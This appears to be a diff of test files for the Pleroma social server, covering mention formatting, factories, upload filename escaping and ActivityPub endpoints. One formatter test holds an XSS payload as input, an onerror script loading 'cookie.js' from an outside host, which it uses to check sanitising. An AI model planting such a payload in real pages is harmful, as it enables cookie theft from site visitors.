	"magnet:?xt=urn:btih:7ec9d298e91d6e4394d1379caf073c77ff3e3136&tr=udp%3A%2F%2Fopentor.org%3A2710&tr=udp%3A%2F%2Ftracker.blackunicorn.xyz%3A6969&tr=udp%3A%2F%2Ftracker.ccc.de%3A80&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=wss%3A%2F%2Ftracker.btorrent.xyz&tr=wss%3A%2F%2Ftracker.fastcast.nz&tr=wss%3A%2F%2Ftracker.openwebtorrent.com"

	expected = "<a href=\"#{text}\">#{text}</a>"

	assert Formatter.add_links({[], text}) \|> Formatter.finalize() == expected
	end
	end

	describe "add_user_links" do
	test "gives a replacement for user links" do
	text = "@gsimg According to @archa_eme_, that is @daggsy. Also hello @archaeme@archae.me"
	gsimg = insert(:user, %{nickname: "gsimg"})

	archaeme =
	insert(:user, %{
	nickname: "archa_eme_",
	info: %Pleroma.User.Info{source_data: %{"url" => "https://archeme/@archa_eme_"}}
	})

	archaeme_remote = insert(:user, %{nickname: "archaeme@archae.me"})

	mentions = Pleroma.Formatter.parse_mentions(text)

	{subs, text} = Formatter.add_user_links({[], text}, mentions)

	assert length(subs) == 3
	Enum.each(subs, fn {uuid, _} -> assert String.contains?(text, uuid) end)

	expected_text =
	- "<span><a data-user='#{gsimg.id}' class='mention' href='#{gsimg.ap_id}'>@<span>gsimg</span></a></span> According to <span><a data-user='#{
	+ "<span class='h-card'><a data-user='#{gsimg.id}' class='u-url mention' href='#{
	+ gsimg.ap_id
	+ }'>@<span>gsimg</span></a></span> According to <span class='h-card'><a data-user='#{
	archaeme.id
	- }' class='mention' href='#{"https://archeme/@archa_eme_"}'>@<span>archa_eme_</span></a></span>, that is @daggsy. Also hello <span><a data-user='#{
	+ }' class='u-url mention' href='#{"https://archeme/@archa_eme_"}'>@<span>archa_eme_</span></a></span>, that is @daggsy. Also hello <span class='h-card'><a data-user='#{
	archaeme_remote.id
	- }' class='mention' href='#{archaeme_remote.ap_id}'>@<span>archaeme</span></a></span>"
	+ }' class='u-url mention' href='#{archaeme_remote.ap_id}'>@<span>archaeme</span></a></span>"

	assert expected_text == Formatter.finalize({subs, text})
	end

	test "gives a replacement for user links when the user is using Osada" do
	mike = User.get_or_fetch("mike@osada.macgirvin.com")

	text = "@mike@osada.macgirvin.com test"

	mentions = Formatter.parse_mentions(text)

	{subs, text} = Formatter.add_user_links({[], text}, mentions)

	assert length(subs) == 1
	Enum.each(subs, fn {uuid, _} -> assert String.contains?(text, uuid) end)

	expected_text =
	- "<span><a data-user='#{mike.id}' class='mention' href='#{mike.ap_id}'>@<span>mike</span></a></span> test"
	+ "<span class='h-card'><a data-user='#{mike.id}' class='u-url mention' href='#{mike.ap_id}'>@<span>mike</span></a></span> test"

	assert expected_text == Formatter.finalize({subs, text})
	end

	test "gives a replacement for single-character local nicknames" do
	text = "@o hi"
	o = insert(:user, %{nickname: "o"})

	mentions = Formatter.parse_mentions(text)

	{subs, text} = Formatter.add_user_links({[], text}, mentions)

	assert length(subs) == 1
	Enum.each(subs, fn {uuid, _} -> assert String.contains?(text, uuid) end)

	expected_text =
	- "<span><a data-user='#{o.id}' class='mention' href='#{o.ap_id}'>@<span>o</span></a></span> hi"
	+ "<span class='h-card'><a data-user='#{o.id}' class='u-url mention' href='#{o.ap_id}'>@<span>o</span></a></span> hi"

	assert expected_text == Formatter.finalize({subs, text})
	end

	test "does not give a replacement for single-character local nicknames who don't exist" do
	text = "@a hi"

	mentions = Formatter.parse_mentions(text)

	{subs, text} = Formatter.add_user_links({[], text}, mentions)

	assert length(subs) == 0
	Enum.each(subs, fn {uuid, _} -> assert String.contains?(text, uuid) end)

	expected_text = "@a hi"
	assert expected_text == Formatter.finalize({subs, text})
	end
	end

	describe ".parse_tags" do
	test "parses tags in the text" do
	text = "Here's a #Test. Maybe these are #working or not. What about #漢字? And #は｡"

	expected = [
	{"#Test", "test"},
	{"#working", "working"},
	{"#漢字", "漢字"},
	{"#は", "は"}
	]

	assert Formatter.parse_tags(text) == expected
	end
	end

	test "it can parse mentions and return the relevant users" do
	text =
	"@@gsimg According to @archaeme, that is @daggsy. Also hello @archaeme@archae.me and @o and @@@jimm"

	o = insert(:user, %{nickname: "o"})
	jimm = insert(:user, %{nickname: "jimm"})
	gsimg = insert(:user, %{nickname: "gsimg"})
	archaeme = insert(:user, %{nickname: "archaeme"})
	archaeme_remote = insert(:user, %{nickname: "archaeme@archae.me"})

	expected_result = [
	{"@gsimg", gsimg},
	{"@archaeme", archaeme},
	{"@archaeme@archae.me", archaeme_remote},
	{"@o", o},
	{"@jimm", jimm}
	]

	assert Formatter.parse_mentions(text) == expected_result
	end

	test "it adds cool emoji" do
	text = "I love :moominmamma:"

	expected_result =
	"I love <img height=\"32px\" width=\"32px\" alt=\"moominmamma\" title=\"moominmamma\" src=\"/finmoji/128px/moominmamma-128.png\" />"

	assert Formatter.emojify(text) == expected_result
	end

	test "it does not add XSS emoji" do
	text =
	"I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"

	custom_emoji = %{
	"'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
	"https://placehold.it/1x1"
	}

	expected_result =
	"I love <img height=\"32px\" width=\"32px\" alt=\"\" title=\"\" src=\"https://placehold.it/1x1\" />"

	assert Formatter.emojify(text, custom_emoji) == expected_result
	end

	test "it returns the emoji used in the text" do
	text = "I love :moominmamma:"

	assert Formatter.get_emoji(text) == [{"moominmamma", "/finmoji/128px/moominmamma-128.png"}]
	end

	test "it returns a nice empty result when no emojis are present" do
	text = "I love moominamma"
	assert Formatter.get_emoji(text) == []
	end

	test "it doesn't die when text is absent" do
	text = nil
	assert Formatter.get_emoji(text) == []
	end

	describe "/mentions_escape" do
	test "it returns text with escaped mention names" do
	text = """
	@a_breakin_glass@cybre.space
	(also, little voice inside my head thinking "maybe this will encourage people
	pronouncing it properly instead of saying _raKEWdo_ ")
	"""

	escape_text = """
	@a\\_breakin\\_glass@cybre\\.space
	(also, little voice inside my head thinking \"maybe this will encourage people
	pronouncing it properly instead of saying _raKEWdo_ \")
	"""

	mentions = [{"@a_breakin_glass@cybre.space", %{}}]
	assert Formatter.mentions_escape(text, mentions) == escape_text
	end
	end
	end
	diff --git a/test/support/factory.ex b/test/support/factory.ex
	index 57fa4a79d..4ac77981a 100644
	--- a/test/support/factory.ex
	+++ b/test/support/factory.ex
	@@ -1,198 +1,223 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2018 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Factory do
	use ExMachina.Ecto, repo: Pleroma.Repo

	def user_factory do
	user = %Pleroma.User{
	name: sequence(:name, &"Test テスト User #{&1}"),
	email: sequence(:email, &"user#{&1}@example.com"),
	nickname: sequence(:nickname, &"nick#{&1}"),
	password_hash: Comeonin.Pbkdf2.hashpwsalt("test"),
	bio: sequence(:bio, &"Tester Number #{&1}"),
	info: %{}
	}

	%{
	user
	\| ap_id: Pleroma.User.ap_id(user),
	follower_address: Pleroma.User.ap_followers(user),
	following: [Pleroma.User.ap_id(user)]
	}
	end

	def note_factory do
	text = sequence(:text, &"This is :moominmamma: note #{&1}")

	user = insert(:user)

	data = %{
	"type" => "Note",
	"content" => text,
	"id" => Pleroma.Web.ActivityPub.Utils.generate_object_id(),
	"actor" => user.ap_id,
	"to" => ["https://www.w3.org/ns/activitystreams#Public"],
	"published" => DateTime.utc_now() \|> DateTime.to_iso8601(),
	"likes" => [],
	"like_count" => 0,
	"context" => "2hu",
	"summary" => "2hu",
	"tag" => ["2hu"],
	"emoji" => %{
	"2hu" => "corndog.png"
	}
	}

	%Pleroma.Object{
	data: data
	}
	end

	def direct_note_factory do
	user2 = insert(:user)

	%Pleroma.Object{data: data} = note_factory()
	%Pleroma.Object{data: Map.merge(data, %{"to" => [user2.ap_id]})}
	end

	+ def article_factory do
	+ note_factory()
	+ \|> Map.put("type", "Article")
	+ end
	+
	def tombstone_factory do
	data = %{
	"type" => "Tombstone",
	"id" => Pleroma.Web.ActivityPub.Utils.generate_object_id(),
	"formerType" => "Note",
	"deleted" => DateTime.utc_now() \|> DateTime.to_iso8601()
	}

	%Pleroma.Object{
	data: data
	}
	end

	def direct_note_activity_factory do
	dm = insert(:direct_note)

	data = %{
	"id" => Pleroma.Web.ActivityPub.Utils.generate_activity_id(),
	"type" => "Create",
	"actor" => dm.data["actor"],
	"to" => dm.data["to"],
	"object" => dm.data,
	"published" => DateTime.utc_now() \|> DateTime.to_iso8601(),
	"context" => dm.data["context"]
	}

	%Pleroma.Activity{
	data: data,
	actor: data["actor"],
	recipients: data["to"]
	}
	end

	def note_activity_factory do
	note = insert(:note)

	data = %{
	"id" => Pleroma.Web.ActivityPub.Utils.generate_activity_id(),
	"type" => "Create",
	"actor" => note.data["actor"],
	"to" => note.data["to"],
	"object" => note.data,
	"published" => DateTime.utc_now() \|> DateTime.to_iso8601(),
	"context" => note.data["context"]
	}

	%Pleroma.Activity{
	data: data,
	actor: data["actor"],
	recipients: data["to"]
	}
	end

	+ def article_activity_factory do
	+ article = insert(:article)
	+
	+ data = %{
	+ "id" => Pleroma.Web.ActivityPub.Utils.generate_activity_id(),
	+ "type" => "Create",
	+ "actor" => article.data["actor"],
	+ "to" => article.data["to"],
	+ "object" => article.data,
	+ "published" => DateTime.utc_now() \|> DateTime.to_iso8601(),
	+ "context" => article.data["context"]
	+ }
	+
	+ %Pleroma.Activity{
	+ data: data,
	+ actor: data["actor"],
	+ recipients: data["to"]
	+ }
	+ end
	+
	def announce_activity_factory do
	note_activity = insert(:note_activity)
	user = insert(:user)

	data = %{
	"type" => "Announce",
	"actor" => note_activity.actor,
	"object" => note_activity.data["id"],
	"to" => [user.follower_address, note_activity.data["actor"]],
	"cc" => ["https://www.w3.org/ns/activitystreams#Public"],
	"context" => note_activity.data["context"]
	}

	%Pleroma.Activity{
	data: data,
	actor: user.ap_id,
	recipients: data["to"]
	}
	end

	def like_activity_factory do
	note_activity = insert(:note_activity)
	user = insert(:user)

	data = %{
	"id" => Pleroma.Web.ActivityPub.Utils.generate_activity_id(),
	"actor" => user.ap_id,
	"type" => "Like",
	"object" => note_activity.data["object"]["id"],
	"published_at" => DateTime.utc_now() \|> DateTime.to_iso8601()
	}

	%Pleroma.Activity{
	data: data
	}
	end

	def follow_activity_factory do
	follower = insert(:user)
	followed = insert(:user)

	data = %{
	"id" => Pleroma.Web.ActivityPub.Utils.generate_activity_id(),
	"actor" => follower.ap_id,
	"type" => "Follow",
	"object" => followed.ap_id,
	"published_at" => DateTime.utc_now() \|> DateTime.to_iso8601()
	}

	%Pleroma.Activity{
	data: data,
	actor: follower.ap_id
	}
	end

	def websub_subscription_factory do
	%Pleroma.Web.Websub.WebsubServerSubscription{
	topic: "http://example.org",
	callback: "http://example/org/callback",
	secret: "here's a secret",
	valid_until: NaiveDateTime.add(NaiveDateTime.utc_now(), 100),
	state: "requested"
	}
	end

	def websub_client_subscription_factory do
	%Pleroma.Web.Websub.WebsubClientSubscription{
	topic: "http://example.org",
	secret: "here's a secret",
	valid_until: nil,
	state: "requested",
	subscribers: []
	}
	end

	def oauth_app_factory do
	%Pleroma.Web.OAuth.App{
	client_name: "Some client",
	redirect_uris: "https://example.com/callback",
	scopes: "read",
	website: "https://example.com",
	client_id: "aaabbb==",
	client_secret: "aaa;/&bbb"
	}
	end
	end
	diff --git a/test/upload_test.exs b/test/upload_test.exs
	index d4ea3a573..b2d9eca38 100644
	--- a/test/upload_test.exs
	+++ b/test/upload_test.exs
	@@ -1,141 +1,171 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2018 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.UploadTest do
	alias Pleroma.Upload
	use Pleroma.DataCase

	describe "Storing a file with the Local uploader" do
	setup [:ensure_local_uploader]

	test "returns a media url" do
	File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg")

	file = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname("test/fixtures/image_tmp.jpg"),
	filename: "image.jpg"
	}

	{:ok, data} = Upload.store(file)

	assert %{"url" => [%{"href" => url}]} = data

	assert String.starts_with?(url, Pleroma.Web.base_url() <> "/media/")
	end

	test "returns a media url with configured base_url" do
	base_url = "https://cache.pleroma.social"

	File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg")

	file = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname("test/fixtures/image_tmp.jpg"),
	filename: "image.jpg"
	}

	{:ok, data} = Upload.store(file, base_url: base_url)

	assert %{"url" => [%{"href" => url}]} = data

	assert String.starts_with?(url, base_url <> "/media/")
	end

	test "copies the file to the configured folder with deduping" do
	File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg")

	file = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname("test/fixtures/image_tmp.jpg"),
	filename: "an [image.jpg"
	}

	{:ok, data} = Upload.store(file, filters: [Pleroma.Upload.Filter.Dedupe])

	assert List.first(data["url"])["href"] ==
	Pleroma.Web.base_url() <>
	"/media/e7a6d0cf595bff76f14c9a98b6c199539559e8b844e02e51e5efcfd1f614a2df.jpg"
	end

	test "copies the file to the configured folder without deduping" do
	File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg")

	file = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname("test/fixtures/image_tmp.jpg"),
	filename: "an [image.jpg"
	}

	{:ok, data} = Upload.store(file)
	assert data["name"] == "an [image.jpg"
	end

	test "fixes incorrect content type" do
	File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg")

	file = %Plug.Upload{
	content_type: "application/octet-stream",
	path: Path.absname("test/fixtures/image_tmp.jpg"),
	filename: "an [image.jpg"
	}

	{:ok, data} = Upload.store(file, filters: [Pleroma.Upload.Filter.Dedupe])
	assert hd(data["url"])["mediaType"] == "image/jpeg"
	end

	test "adds missing extension" do
	File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg")

	file = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname("test/fixtures/image_tmp.jpg"),
	filename: "an [image"
	}

	{:ok, data} = Upload.store(file)
	assert data["name"] == "an [image.jpg"
	end

	test "fixes incorrect file extension" do
	File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg")

	file = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname("test/fixtures/image_tmp.jpg"),
	filename: "an [image.blah"
	}

	{:ok, data} = Upload.store(file)
	assert data["name"] == "an [image.jpg"
	end

	test "don't modify filename of an unknown type" do
	File.cp("test/fixtures/test.txt", "test/fixtures/test_tmp.txt")

	file = %Plug.Upload{
	content_type: "text/plain",
	path: Path.absname("test/fixtures/test_tmp.txt"),
	filename: "test.txt"
	}

	{:ok, data} = Upload.store(file)
	assert data["name"] == "test.txt"
	end

	test "copies the file to the configured folder with anonymizing filename" do
	File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg")

	file = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname("test/fixtures/image_tmp.jpg"),
	filename: "an [image.jpg"
	}

	{:ok, data} = Upload.store(file, filters: [Pleroma.Upload.Filter.AnonymizeFilename])

	refute data["name"] == "an [image.jpg"
	end
	+
	+ test "escapes invalid characters in url" do
	+ File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg")
	+
	+ file = %Plug.Upload{
	+ content_type: "image/jpg",
	+ path: Path.absname("test/fixtures/image_tmp.jpg"),
	+ filename: "an… image.jpg"
	+ }
	+
	+ {:ok, data} = Upload.store(file)
	+ [attachment_url \| _] = data["url"]
	+
	+ assert Path.basename(attachment_url["href"]) == "an%E2%80%A6%20image.jpg"
	+ end
	+
	+ test "replaces : (colon) and ? (question-mark) to %3A and %3F (respectively)" do
	+ File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg")
	+
	+ file = %Plug.Upload{
	+ content_type: "image/jpg",
	+ path: Path.absname("test/fixtures/image_tmp.jpg"),
	+ filename: "is:an?image.jpg"
	+ }
	+
	+ {:ok, data} = Upload.store(file)
	+ [attachment_url \| _] = data["url"]
	+
	+ assert Path.basename(attachment_url["href"]) == "is%3Aan%3Fimage.jpg"
	+ end
	end
	end
	diff --git a/test/web/activity_pub/activity_pub_controller_test.exs b/test/web/activity_pub/activity_pub_controller_test.exs
	index 7aed8c71d..52e67f046 100644
	--- a/test/web/activity_pub/activity_pub_controller_test.exs
	+++ b/test/web/activity_pub/activity_pub_controller_test.exs
	@@ -1,407 +1,447 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2018 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.ActivityPub.ActivityPubControllerTest do
	use Pleroma.Web.ConnCase
	import Pleroma.Factory
	alias Pleroma.Web.ActivityPub.{UserView, ObjectView}
	alias Pleroma.{Object, Repo, User}
	alias Pleroma.Activity

	setup_all do
	Tesla.Mock.mock_global(fn env -> apply(HttpRequestMock, :request, [env]) end)
	:ok
	end

	describe "/relay" do
	test "with the relay active, it returns the relay user", %{conn: conn} do
	res =
	conn
	\|> get(activity_pub_path(conn, :relay))
	\|> json_response(200)

	assert res["id"] =~ "/relay"
	end

	test "with the relay disabled, it returns 404", %{conn: conn} do
	Pleroma.Config.put([:instance, :allow_relay], false)

	conn
	\|> get(activity_pub_path(conn, :relay))
	\|> json_response(404)
	\|> assert

	Pleroma.Config.put([:instance, :allow_relay], true)
	end
	end

	describe "/users/:nickname" do
	test "it returns a json representation of the user", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> put_req_header("accept", "application/activity+json")
	\|> get("/users/#{user.nickname}")

	user = Repo.get(User, user.id)

	assert json_response(conn, 200) == UserView.render("user.json", %{user: user})
	end
	end

	describe "/object/:uuid" do
	test "it returns a json representation of the object", %{conn: conn} do
	note = insert(:note)
	uuid = String.split(note.data["id"], "/") \|> List.last()

	conn =
	conn
	\|> put_req_header("accept", "application/activity+json")
	\|> get("/objects/#{uuid}")

	assert json_response(conn, 200) == ObjectView.render("object.json", %{object: note})
	end

	test "it returns 404 for non-public messages", %{conn: conn} do
	note = insert(:direct_note)
	uuid = String.split(note.data["id"], "/") \|> List.last()

	conn =
	conn
	\|> put_req_header("accept", "application/activity+json")
	\|> get("/objects/#{uuid}")

	assert json_response(conn, 404)
	end

	test "it returns 404 for tombstone objects", %{conn: conn} do
	tombstone = insert(:tombstone)
	uuid = String.split(tombstone.data["id"], "/") \|> List.last()

	conn =
	conn
	\|> put_req_header("accept", "application/activity+json")
	\|> get("/objects/#{uuid}")

	assert json_response(conn, 404)
	end
	end

	+ describe "/object/:uuid/likes" do
	+ test "it returns the like activities in a collection", %{conn: conn} do
	+ like = insert(:like_activity)
	+ uuid = String.split(like.data["object"], "/") \|> List.last()
	+
	+ result =
	+ conn
	+ \|> put_req_header("accept", "application/activity+json")
	+ \|> get("/objects/#{uuid}/likes")
	+ \|> json_response(200)
	+
	+ assert List.first(result["first"]["orderedItems"])["id"] == like.data["id"]
	+ end
	+ end
	+
	describe "/activities/:uuid" do
	test "it returns a json representation of the activity", %{conn: conn} do
	activity = insert(:note_activity)
	uuid = String.split(activity.data["id"], "/") \|> List.last()

	conn =
	conn
	\|> put_req_header("accept", "application/activity+json")
	\|> get("/activities/#{uuid}")

	assert json_response(conn, 200) == ObjectView.render("object.json", %{object: activity})
	end

	test "it returns 404 for non-public activities", %{conn: conn} do
	activity = insert(:direct_note_activity)
	uuid = String.split(activity.data["id"], "/") \|> List.last()

	conn =
	conn
	\|> put_req_header("accept", "application/activity+json")
	\|> get("/activities/#{uuid}")

	assert json_response(conn, 404)
	end
	end

	describe "/inbox" do
	test "it inserts an incoming activity into the database", %{conn: conn} do
	data = File.read!("test/fixtures/mastodon-post-activity.json") \|> Poison.decode!()

	conn =
	conn
	\|> assign(:valid_signature, true)
	\|> put_req_header("content-type", "application/activity+json")
	\|> post("/inbox", data)

	assert "ok" == json_response(conn, 200)
	:timer.sleep(500)
	assert Activity.get_by_ap_id(data["id"])
	end
	end

	describe "/users/:nickname/inbox" do
	test "it inserts an incoming activity into the database", %{conn: conn} do
	user = insert(:user)

	data =
	File.read!("test/fixtures/mastodon-post-activity.json")
	\|> Poison.decode!()
	\|> Map.put("bcc", [user.ap_id])

	conn =
	conn
	\|> assign(:valid_signature, true)
	\|> put_req_header("content-type", "application/activity+json")
	\|> post("/users/#{user.nickname}/inbox", data)

	assert "ok" == json_response(conn, 200)
	:timer.sleep(500)
	assert Activity.get_by_ap_id(data["id"])
	end

	test "it rejects reads from other users", %{conn: conn} do
	user = insert(:user)
	otheruser = insert(:user)

	conn =
	conn
	\|> assign(:user, otheruser)
	\|> put_req_header("accept", "application/activity+json")
	\|> get("/users/#{user.nickname}/inbox")

	assert json_response(conn, 403)
	end

	test "it returns a note activity in a collection", %{conn: conn} do
	note_activity = insert(:direct_note_activity)
	user = User.get_cached_by_ap_id(hd(note_activity.data["to"]))

	conn =
	conn
	\|> assign(:user, user)
	\|> put_req_header("accept", "application/activity+json")
	\|> get("/users/#{user.nickname}/inbox")

	assert response(conn, 200) =~ note_activity.data["object"]["content"]
	end
	end

	describe "/users/:nickname/outbox" do
	test "it returns a note activity in a collection", %{conn: conn} do
	note_activity = insert(:note_activity)
	user = User.get_cached_by_ap_id(note_activity.data["actor"])

	conn =
	conn
	\|> put_req_header("accept", "application/activity+json")
	\|> get("/users/#{user.nickname}/outbox")

	assert response(conn, 200) =~ note_activity.data["object"]["content"]
	end

	test "it returns an announce activity in a collection", %{conn: conn} do
	announce_activity = insert(:announce_activity)
	user = User.get_cached_by_ap_id(announce_activity.data["actor"])

	conn =
	conn
	\|> put_req_header("accept", "application/activity+json")
	\|> get("/users/#{user.nickname}/outbox")

	assert response(conn, 200) =~ announce_activity.data["object"]
	end

	test "it rejects posts from other users", %{conn: conn} do
	data = File.read!("test/fixtures/activitypub-client-post-activity.json") \|> Poison.decode!()
	user = insert(:user)
	otheruser = insert(:user)

	conn =
	conn
	\|> assign(:user, otheruser)
	\|> put_req_header("content-type", "application/activity+json")
	\|> post("/users/#{user.nickname}/outbox", data)

	assert json_response(conn, 403)
	end

	test "it inserts an incoming create activity into the database", %{conn: conn} do
	data = File.read!("test/fixtures/activitypub-client-post-activity.json") \|> Poison.decode!()
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> put_req_header("content-type", "application/activity+json")
	\|> post("/users/#{user.nickname}/outbox", data)

	result = json_response(conn, 201)
	assert Activity.get_by_ap_id(result["id"])
	end

	test "it rejects an incoming activity with bogus type", %{conn: conn} do
	data = File.read!("test/fixtures/activitypub-client-post-activity.json") \|> Poison.decode!()
	user = insert(:user)

	data =
	data
	\|> Map.put("type", "BadType")

	conn =
	conn
	\|> assign(:user, user)
	\|> put_req_header("content-type", "application/activity+json")
	\|> post("/users/#{user.nickname}/outbox", data)

	assert json_response(conn, 400)
	end

	test "it erects a tombstone when receiving a delete activity", %{conn: conn} do
	note_activity = insert(:note_activity)
	user = User.get_cached_by_ap_id(note_activity.data["actor"])

	data = %{
	type: "Delete",
	object: %{
	id: note_activity.data["object"]["id"]
	}
	}

	conn =
	conn
	\|> assign(:user, user)
	\|> put_req_header("content-type", "application/activity+json")
	\|> post("/users/#{user.nickname}/outbox", data)

	result = json_response(conn, 201)
	assert Activity.get_by_ap_id(result["id"])

	object = Object.get_by_ap_id(note_activity.data["object"]["id"])
	assert object
	assert object.data["type"] == "Tombstone"
	end

	test "it rejects delete activity of object from other actor", %{conn: conn} do
	note_activity = insert(:note_activity)
	user = insert(:user)

	data = %{
	type: "Delete",
	object: %{
	id: note_activity.data["object"]["id"]
	}
	}

	conn =
	conn
	\|> assign(:user, user)
	\|> put_req_header("content-type", "application/activity+json")
	\|> post("/users/#{user.nickname}/outbox", data)

	assert json_response(conn, 400)
	end
	+
	+ test "it increases like count when receiving a like action", %{conn: conn} do
	+ note_activity = insert(:note_activity)
	+ user = User.get_cached_by_ap_id(note_activity.data["actor"])
	+
	+ data = %{
	+ type: "Like",
	+ object: %{
	+ id: note_activity.data["object"]["id"]
	+ }
	+ }
	+
	+ conn =
	+ conn
	+ \|> assign(:user, user)
	+ \|> put_req_header("content-type", "application/activity+json")
	+ \|> post("/users/#{user.nickname}/outbox", data)
	+
	+ result = json_response(conn, 201)
	+ assert Activity.get_by_ap_id(result["id"])
	+
	+ object = Object.get_by_ap_id(note_activity.data["object"]["id"])
	+ assert object
	+ assert object.data["like_count"] == 1
	+ end
	end

	describe "/users/:nickname/followers" do
	test "it returns the followers in a collection", %{conn: conn} do
	user = insert(:user)
	user_two = insert(:user)
	User.follow(user, user_two)

	result =
	conn
	\|> get("/users/#{user_two.nickname}/followers")
	\|> json_response(200)

	assert result["first"]["orderedItems"] == [user.ap_id]
	end

	test "it returns returns empty if the user has 'hide_network' set", %{conn: conn} do
	user = insert(:user)
	user_two = insert(:user, %{info: %{hide_network: true}})
	User.follow(user, user_two)

	result =
	conn
	\|> get("/users/#{user_two.nickname}/followers")
	\|> json_response(200)

	assert result["first"]["orderedItems"] == []
	assert result["totalItems"] == 1
	end

	test "it works for more than 10 users", %{conn: conn} do
	user = insert(:user)

	Enum.each(1..15, fn _ ->
	other_user = insert(:user)
	User.follow(other_user, user)
	end)

	result =
	conn
	\|> get("/users/#{user.nickname}/followers")
	\|> json_response(200)

	assert length(result["first"]["orderedItems"]) == 10
	assert result["first"]["totalItems"] == 15
	assert result["totalItems"] == 15

	result =
	conn
	\|> get("/users/#{user.nickname}/followers?page=2")
	\|> json_response(200)

	assert length(result["orderedItems"]) == 5
	assert result["totalItems"] == 15
	end
	end

	describe "/users/:nickname/following" do
	test "it returns the following in a collection", %{conn: conn} do
	user = insert(:user)
	user_two = insert(:user)
	User.follow(user, user_two)

	result =
	conn
	\|> get("/users/#{user.nickname}/following")
	\|> json_response(200)

	assert result["first"]["orderedItems"] == [user_two.ap_id]
	end

	test "it returns returns empty if the user has 'hide_network' set", %{conn: conn} do
	user = insert(:user, %{info: %{hide_network: true}})
	user_two = insert(:user)
	User.follow(user, user_two)

	result =
	conn
	\|> get("/users/#{user.nickname}/following")
	\|> json_response(200)

	assert result["first"]["orderedItems"] == []
	assert result["totalItems"] == 1
	end

	test "it works for more than 10 users", %{conn: conn} do
	user = insert(:user)

	Enum.each(1..15, fn _ ->
	user = Repo.get(User, user.id)
	other_user = insert(:user)
	User.follow(user, other_user)
	end)

	result =
	conn
	\|> get("/users/#{user.nickname}/following")
	\|> json_response(200)

	assert length(result["first"]["orderedItems"]) == 10
	assert result["first"]["totalItems"] == 15
	assert result["totalItems"] == 15

	result =
	conn
	\|> get("/users/#{user.nickname}/following?page=2")
	\|> json_response(200)

	assert length(result["orderedItems"]) == 5
	assert result["totalItems"] == 15
	end
	end
	end
	diff --git a/test/web/activity_pub/transmogrifier_test.exs b/test/web/activity_pub/transmogrifier_test.exs
	index a5fd87ed4..87d0ab559 100644
	--- a/test/web/activity_pub/transmogrifier_test.exs
	+++ b/test/web/activity_pub/transmogrifier_test.exs
	@@ -1,1036 +1,1057 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2018 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do
	use Pleroma.DataCase
	alias Pleroma.Web.ActivityPub.Transmogrifier
	alias Pleroma.Web.ActivityPub.Utils
	alias Pleroma.Web.ActivityPub.ActivityPub
	alias Pleroma.Web.OStatus
	alias Pleroma.Activity
	alias Pleroma.User
	alias Pleroma.Repo
	alias Pleroma.Web.Websub.WebsubClientSubscription

	import Pleroma.Factory
	alias Pleroma.Web.CommonAPI

	setup_all do
	Tesla.Mock.mock_global(fn env -> apply(HttpRequestMock, :request, [env]) end)
	:ok
	end

	describe "handle_incoming" do
	test "it ignores an incoming notice if we already have it" do
	activity = insert(:note_activity)

	data =
	File.read!("test/fixtures/mastodon-post-activity.json")
	\|> Poison.decode!()
	\|> Map.put("object", activity.data["object"])

	{:ok, returned_activity} = Transmogrifier.handle_incoming(data)

	assert activity == returned_activity
	end

	test "it fetches replied-to activities if we don't have them" do
	data =
	File.read!("test/fixtures/mastodon-post-activity.json")
	\|> Poison.decode!()

	object =
	data["object"]
	\|> Map.put("inReplyTo", "https://shitposter.club/notice/2827873")

	data =
	data
	\|> Map.put("object", object)

	{:ok, returned_activity} = Transmogrifier.handle_incoming(data)

	assert activity =
	Activity.get_create_activity_by_object_ap_id(
	"tag:shitposter.club,2017-05-05:noticeId=2827873:objectType=comment"
	)

	assert returned_activity.data["object"]["inReplyToAtomUri"] ==
	"https://shitposter.club/notice/2827873"

	assert returned_activity.data["object"]["inReplyToStatusId"] == activity.id
	end

	test "it works for incoming notices" do
	data = File.read!("test/fixtures/mastodon-post-activity.json") \|> Poison.decode!()

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["id"] ==
	"http://mastodon.example.org/users/admin/statuses/99512778738411822/activity"

	assert data["context"] ==
	"tag:mastodon.example.org,2018-02-12:objectId=20:objectType=Conversation"

	assert data["to"] == ["https://www.w3.org/ns/activitystreams#Public"]

	assert data["cc"] == [
